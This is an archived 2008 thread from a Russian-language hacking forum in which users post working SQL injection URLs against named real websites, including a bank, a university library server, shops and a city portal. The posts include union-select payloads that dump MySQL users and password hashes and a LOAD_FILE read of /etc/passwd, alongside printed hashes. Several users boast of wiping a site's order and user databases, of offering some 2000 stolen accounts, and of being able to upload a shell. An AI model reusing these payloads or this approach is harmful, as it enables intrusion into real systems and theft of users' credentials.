ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

27.02.2008, 02:24
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
И снова горе веб-дизайнеры: "GiG Web solutions" Киев
Форум - Web программирование  (PHP,HTML,CSS,JavaScript,ASP)
_http://gig.kiev.ua/show_message.php?conf_id=-8+union+select+1,aes_decrypt(aes_encrypt(user(),0x 71),0x71),3,4,5,6/*&upper_id=0
gigkievua_user@localhost
gigkievua_db1
5.0.41-community
ветка пятая, раскручивать не стал
КТО ИМ ДАЁТ ДЕНЕГ???
|
|
|

27.02.2008, 18:33
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме: 629558
Репутация:
52
|
|
Карейдзы нах!
После часика мучений удалос убить базу заказоф и юзероф и добавить новай тур = )
http://img264.imageshack.us/my.php?image=kareidzigz5.jpg
|
|
|

27.02.2008, 04:09
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
Только учусь!
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
все таки решил добить сам. пользователей больше 2000 (у меня пока 700, но скоро добъю) вывод типа имя пользователя,пароль,имя,мы о,аська(оч много элитных. Хотел бы себе  ) кому надо обращайтесь в личку поделюсь.
------------------------------
прошу прощенья, если не в этой теме. Не наказывайте пожалуйста 
|
|
|

27.02.2008, 13:22
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме: 1122391
Репутация:
209
|
|
fantastic.library.cornell.edu
Код:
http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws(0x3a3a3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
user() = fan@localhost
database() - fantastic
version() - 4.1.7-standart
Код:
http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9,10,11,12/*
Код:
http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws(0x3a3a3a,user,password),2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
Смотрим исходник =)
|
|
|

27.02.2008, 13:21
|
|
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме: 1379382
Репутация:
378
|
|
банкирЫЫЫ -)
мда, все-таки решил выложить на благо родного ачата...
ВНИМАНИЕ: Сегодня у нас БАНК (точнее сайт онлайн банкинга) - дырявый как windows 98 =)
Версия мускула - 5 с хреном, соответственно, есть доступ к :
_http://www.mcb-bank.com/index.php?nd=menu&id=9999+union+select+1,TABLE_NAM E,3,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*
Наиболее приглянувшиеся мне таблицы:
===================================
isearch_admin_log
messages
message_id
message_image
message_month
message_year
message_title
specials
id
titel
text
image
active
...
users
id
username
password
admin
lastlogin
===================================
и самое интересное - КАВЫЧКИ НЕ ФИЛЬТРУЮТСЯ ВООБЩЕ!!!
так что, есть возможность залить шелл.
Вобщем, пользуйтесь на здоровье 
|
|
|

27.02.2008, 14:19
|
|
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме: 34487
Репутация:
46
|
|
FreeBSD Forum!!
http://www.bsdforums.org/forums/items/main.php?type=-1%20union%20select%201,user(),3,4,5,6,7,8,9,10,11, 12,13--
cycyouth.org ROOT
http://www.cycyouth.org/main.php?pgID=-1%20union%20select%201,concat(user,0x3a,password,0 x3a,file_priv),3,4,5,6,7,8,9,10+from+mysql.user--
root:*D4F86802E5F140FEA24A52DF0D5B9B0381A5119D:Y
tukums.lv ROOT
http://aa.tukums.lv/Default.asp?id=-1%20union%20select%201,2,password,4,5,6,7,8,9+from +mysql.user--
*923518145726A3E8F9098E43D6A56C2BC44BD1DC
|
|
|

27.02.2008, 18:10
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
Внимание!!!
никто никогда не хотел себе швейцарские часы?
теперь вы можете себе такое позволить :-D
---------------------------------------------------------------
шоп специализирующийся на продаже швейцарских часов
----------------------------------------------------------------
http://www.deka.dn.ua/navigation.php?nav_id=-8+union+select+1,2,3,4,5,6,concat(version(),0x3a,u ser(),0x3a,database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29/*
4.0.24-log:bazik@localhost:deka
---------------------------------------------------------------
письмо админу отправил
Последний раз редактировалось samarin; 27.02.2008 в 18:22..
|
|
|

27.02.2008, 22:50
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме: 645316
Репутация:
327
|
|
computergiants.com Шоп....Просто Шоп
_http://www.computergiants.com/stores/sitelet.asp?siteletid=-1'%66%72%6f%6d+1,2/*
|
|
|

27.02.2008, 23:40
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
Светотехника
http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user( ),database()),3/*
5.0.32-Debian_7etch1-log:firstline_base@77.221.130.10:firstline_base
имена таблиц странные:
2103_forum_auth_access
2103_forum_banlist
2103_forum_categories
2103_forum_config
2103_forum_confirm
2103_forum_disallow
2103_forum_forum_prune
2103_forum_forums
2103_forum_groups
2103_forum_posts
2103_forum_privmsgs
2103_forum_privmsgs_text
2103_forum_ranks
2103_forum_sessions_keys
2103_forum_user_group
2103_forum_users
|
|
|

28.02.2008, 00:38
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
Туристическое снаряжение
-------------------------------------
http://www.alexikaoutdoor.com.ua/product.php?prod_id=-177+union+select+1,2,3,4,5,6,7,8,9,10/*
4.0.27-standard-log:dumala2_alexikaoutdoor:dumala2_axbase@localhos t
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|